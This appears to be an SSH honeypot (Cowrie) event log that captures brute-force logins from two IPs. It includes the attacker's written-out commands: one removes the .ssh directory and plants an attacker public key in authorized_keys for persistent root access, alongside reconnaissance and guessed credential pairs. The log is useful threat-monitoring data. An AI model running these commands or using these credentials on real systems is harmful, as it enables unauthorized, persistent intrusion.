{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:14:46.630634Z","src_ip":"212.227.235.229","session":"dd94ac375c49"}
{"eventid":"cowrie.login.success","username":"root","password":"1qazxsw2#","message":"login attempt [root/1qazxsw2#] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:14:47.541995Z","src_ip":"212.227.235.229","session":"dd94ac375c49"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:14:48.003165Z","src_ip":"212.227.235.229","session":"dd94ac375c49"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:14:48.004493Z","src_ip":"212.227.235.229","session":"dd94ac375c49"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:14:48.005735Z","src_ip":"212.227.235.229","session":"dd94ac375c49"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:14:48.225031Z","src_ip":"212.227.235.229","session":"dd94ac375c49"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:14:48.720980Z","src_ip":"212.227.235.229","session":"dd94ac375c49"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T06:14:48.721689Z","src_ip":"212.227.235.229","session":"dd94ac375c49"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T06:14:48.943102Z","src_ip":"212.227.235.229","session":"dd94ac375c49"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:14:48.944007Z","src_ip":"212.227.235.229","session":"dd94ac375c49"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":27661,"dst_ip":"1.2.3.4","dst_port":22,"session":"9792bdf7a492","protocol":"ssh","message":"New connection: 212.227.235.229:27661 (1.2.3.4:22) [session: 9792bdf7a492]","sensor":"my-vps","timestamp":"2025-08-31T06:14:49.155121Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:14:49.159687Z","src_ip":"212.227.235.229","session":"9792bdf7a492"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:14:49.372808Z","src_ip":"212.227.235.229","session":"9792bdf7a492"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44226,"dst_ip":"1.2.3.4","dst_port":22,"session":"f82f7f3f53ab","protocol":"ssh","message":"New connection: 212.227.235.229:44226 (1.2.3.4:22) [session: f82f7f3f53ab]","sensor":"my-vps","timestamp":"2025-08-31T06:14:49.672676Z"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T06:14:50.227735Z","src_ip":"212.227.235.229","session":"9792bdf7a492"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:14:50.400236Z","src_ip":"212.227.235.229","session":"f82f7f3f53ab"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:14:50.401475Z","src_ip":"212.227.235.229","session":"f82f7f3f53ab"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44082,"dst_ip":"1.2.3.4","dst_port":22,"session":"a72d5c50a93a","protocol":"ssh","message":"New connection: 212.227.235.229:44082 (1.2.3.4:22) [session: a72d5c50a93a]","sensor":"my-vps","timestamp":"2025-08-31T06:14:50.419178Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:14:50.419954Z","src_ip":"212.227.235.229","session":"a72d5c50a93a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:14:50.677859Z","src_ip":"212.227.235.229","session":"a72d5c50a93a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":12890,"dst_ip":"1.2.3.4","dst_port":22,"session":"8ca70afde52a","protocol":"ssh","message":"New connection: 212.227.235.229:12890 (1.2.3.4:22) [session: 8ca70afde52a]","sensor":"my-vps","timestamp":"2025-08-31T06:14:50.800863Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-31T06:14:50.802367Z","src_ip":"212.227.235.229","session":"8ca70afde52a"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-31T06:14:50.907785Z","src_ip":"212.227.235.229","session":"8ca70afde52a"}
{"eventid":"cowrie.login.failed","username":"admin","password":"woodside","message":"login attempt [admin/woodside] failed","sensor":"my-vps","timestamp":"2025-08-31T06:14:51.412946Z","src_ip":"212.227.235.229","session":"8ca70afde52a"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:14:51.446473Z","src_ip":"212.227.235.229","session":"9792bdf7a492"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33050,"dst_ip":"1.2.3.4","dst_port":22,"session":"f17887f61076","protocol":"ssh","message":"New connection: 212.227.235.229:33050 (1.2.3.4:22) [session: f17887f61076]","sensor":"my-vps","timestamp":"2025-08-31T06:14:51.660473Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:14:51.664837Z","src_ip":"212.227.235.229","session":"f17887f61076"}
{"eventid":"cowrie.login.failed","username":"ts3","password":"123","message":"login attempt [ts3/123] failed","sensor":"my-vps","timestamp":"2025-08-31T06:14:51.745361Z","src_ip":"212.227.235.229","session":"a72d5c50a93a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:14:51.878604Z","src_ip":"212.227.235.229","session":"f17887f61076"}
{"eventid":"cowrie.login.failed","username":"admin","password":"woodrow","message":"login attempt [admin/woodrow] failed","sensor":"my-vps","timestamp":"2025-08-31T06:14:52.519490Z","src_ip":"212.227.235.229","session":"8ca70afde52a"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:14:52.737465Z","src_ip":"212.227.235.229","session":"f17887f61076"}
{"eventid":"cowrie.login.success","username":"root","password":"Admin@123","message":"login attempt [root/Admin@123] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:14:52.904067Z","src_ip":"212.227.125.160","session":"34865339fa95"}
{"eventid":"cowrie.session.closed","duration":"6.5","message":"Connection lost after 6.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:14:52.953435Z","src_ip":"212.227.235.229","session":"dd94ac375c49"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:14:52.954437Z","src_ip":"212.227.235.229","session":"f17887f61076"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:14:53.005338Z","src_ip":"212.227.235.229","session":"a72d5c50a93a"}
{"eventid":"cowrie.login.failed","username":"admin","password":"witch","message":"login attempt [admin/witch] failed","sensor":"my-vps","timestamp":"2025-08-31T06:14:53.626858Z","src_ip":"212.227.235.229","session":"8ca70afde52a"}
{"eventid":"cowrie.login.failed","username":"admin","password":"wayer","message":"login attempt [admin/wayer] failed","sensor":"my-vps","timestamp":"2025-08-31T06:14:54.734369Z","src_ip":"212.227.235.229","session":"8ca70afde52a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37544,"dst_ip":"1.2.3.4","dst_port":22,"session":"592f662fb3d3","protocol":"ssh","message":"New connection: 212.227.235.229:37544 (1.2.3.4:22) [session: 592f662fb3d3]","sensor":"my-vps","timestamp":"2025-08-31T06:14:55.415126Z"}
{"eventid":"cowrie.login.failed","username":"admin","password":"waldo1","message":"login attempt [admin/waldo1] failed","sensor":"my-vps","timestamp":"2025-08-31T06:14:55.841342Z","src_ip":"212.227.235.229","session":"8ca70afde52a"}
{"eventid":"cowrie.login.failed","username":"test4","password":"admin123","message":"login attempt [test4/admin123] failed","sensor":"my-vps","timestamp":"2025-08-31T06:14:56.452844Z","src_ip":"212.227.235.229","session":"f82f7f3f53ab"}
{"eventid":"cowrie.session.closed","duration":"6.1","message":"Connection lost after 6.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:14:56.949177Z","src_ip":"212.227.235.229","session":"8ca70afde52a"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:14:58.285326Z","src_ip":"212.227.235.229","session":"f82f7f3f53ab"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:14:59.275473Z","src_ip":"212.227.235.229","session":"592f662fb3d3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T06:14:59.317374Z","src_ip":"212.227.235.229","session":"592f662fb3d3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:15:04.019029Z","src_ip":"212.227.125.160","session":"34865339fa95"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T06:15:04.019895Z","src_ip":"212.227.125.160","session":"34865339fa95"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53962,"dst_ip":"1.2.3.4","dst_port":22,"session":"5b3ca6f56bd0","protocol":"ssh","message":"New connection: 212.227.125.160:53962 (1.2.3.4:22) [session: 5b3ca6f56bd0]","sensor":"my-vps","timestamp":"2025-08-31T06:15:06.669832Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:15:07.707625Z","src_ip":"212.227.125.160","session":"5b3ca6f56bd0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T06:15:07.708381Z","src_ip":"212.227.125.160","session":"5b3ca6f56bd0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45864,"dst_ip":"1.2.3.4","dst_port":22,"session":"ed944b24cc8b","protocol":"ssh","message":"New connection: 212.227.235.229:45864 (1.2.3.4:22) [session: ed944b24cc8b]","sensor":"my-vps","timestamp":"2025-08-31T06:15:10.082337Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34230,"dst_ip":"1.2.3.4","dst_port":22,"session":"8962f1acbd75","protocol":"ssh","message":"New connection: 212.227.125.160:34230 (1.2.3.4:22) [session: 8962f1acbd75]","sensor":"my-vps","timestamp":"2025-08-31T06:15:10.244132Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:15:10.826128Z","src_ip":"212.227.125.160","session":"8962f1acbd75"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa